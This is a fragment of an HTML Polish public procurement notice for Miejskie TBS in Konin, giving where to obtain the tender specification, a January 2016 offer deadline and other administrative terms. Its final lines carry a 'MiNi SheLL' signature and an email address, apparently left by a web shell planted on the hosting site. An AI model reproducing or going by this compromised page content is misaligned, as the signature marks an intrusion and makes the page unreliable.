<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mtbs.konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w cenie 123 zł brutto można odebrać w wersji papierowej w siedzibie Zamawiającego - Konin, 62-500 , ul.3 Maja 21 lub za zaliczeniem pocztowym do dnia 5 stycznia 2016 r..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2016 godzina 10:00, miejsce: Miejskie TBS Sp. z o.o.w Koninie - ul.3 Maja 21, 62-500 KONIN.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com